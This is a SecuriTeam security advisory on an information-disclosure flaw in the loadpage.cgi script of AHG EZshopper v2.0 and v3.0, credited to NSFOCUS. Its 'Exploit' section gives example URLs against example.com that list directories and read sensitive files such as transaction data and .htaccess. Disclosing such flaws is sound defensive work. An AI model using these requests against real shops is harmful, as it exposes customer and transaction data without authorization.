SecuriTeam - AHG EZshopper loadpage.cgi exposes sensitive file and directory contents

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

SecuriTeam
Beyond Security

SecuriTeam Home
Ask the Team
Mailing Lists
Advertising Info
Blogs

Black Box Testing
Vulnerability Assessment
Vulnerability Scanner

	SecuriTeam in Your Inbox

	E-mail this article to a friend

New vulnerability?
New tool?
Tell us

AHG's EZshopper is a modular e-commerce solution. NSFOCUS discovered a security flaw in the loadpage.cgi of EZshopper. Its exploitation allows attacker to retrieve a file list of EZshopper directories and sensitive file contents.

Credit:
The information has been provided by Nsfocus Security Team.

Protect your website!
Use an External Vulnerability Scanner!
Nothing to install. First report in 1 hour!
www.beyondsecurity.com/vulnerability-scanner

Vulnerable systems:
Alex Heiphetz Group EZshopper v.3.0 for Unix
Alex Heiphetz Group EZshopper v.2.0 for Unix

EZshopper contains some Perl scripts, including a CGI program called loadpage.cgi that is used to open and show HTML files under EZshopper's directory.

Usually this program is called as follows:

EZshopper v3.0:
http://www.example.com/cgi-bin/ezshopper3/loadpage.cgi?user_id=<id>&file=<filename>

EZshopper v2.0:
http://www.example.com/cgi-bin/ezshopper2/loadpage.cgi?<id>+<filename>

But loadpage.cgi does not check the "<filename>" data (submitted by user) to make sure it is an real file name. Provided with a directory name as a "<filename>", loadpage.cgi will list the content of current EZshopper directory. According to the returned information an attacker can open a subdirectory or view some sensitive file contents like user's data files, transaction info file and .htaccess.

Note: Exploit of this vulnerability can't be used to view the directories outside of EZshopper since the new versions of EZshopper will check if a filename contains "../", and if it does will not let the request through.

Exploit:
By submitting the following URL you will be able to see the file list of EZshopper root directory (In case that the page is blank, check the page source code in the browser):

EZshopper v3.0:
http://www.example.com/cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/

EZshopper v2.0:
http://www.example.com/cgi-bin/ezshopper2/loadpage.cgi?id+/

To view file list of EZshopper subdirectory, submit the following URL:

EZshopper v3.0:
http://www.example.com/cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/subdirectory/

EZshopper v2.0:
http://www.example.com/cgi-bin/ezshopper2/loadpage.cgi?id+/subdirectory/

Once an attacker is able to get the list, he can the following URL to view the content of arbitrary files:

EZshopper v3.0:
http://www.example.com/cgi-bin/ezshopper3/loadpage.cgi?user_id=<id>&file=/<directory>/<filename>

EZshopper v2.0:
http://www.example.com/cgi-bin/ezshopper2/loadpage.cgi?<id>+/<directory>/<filename>

	PHP dba_replace() Arbitrary File Destruction
	VLC Media Player RealText Processing Stack Overflow Vulnerability
	LibSPF2 DNS TXT Record Parsing Bug
	GNU Enscript "setfilename" Special Escape Buffer Overflow
	File-Find-Object Format String Vulnerability
	Veritas Storage Foundation Arbitrary File Read Vulnerability
	Sun Solstice AdminSuite sadmind adm_build_path() Buffer Overflow Vulnerability
	Apache Tomcat Information Disclosure (RemoteFilterValve)
	Apple CUPS HP-GL/2 filter Code Execution Vulnerability
	WordPress MU wpmu-Blogs.php Crose Site Scrpting Vulnerability
	strongSwan IKEv2 Denial of Service Vulnerability
	Cross-Site Scripting Filter Evasion in Various Frameworks / Applications
	MySQL Charset Truncation Vulnerability
	Wordpress user_login Column SQL Truncation Vulnerability
	Joomla Weak Random Password Reset Token Vulnerability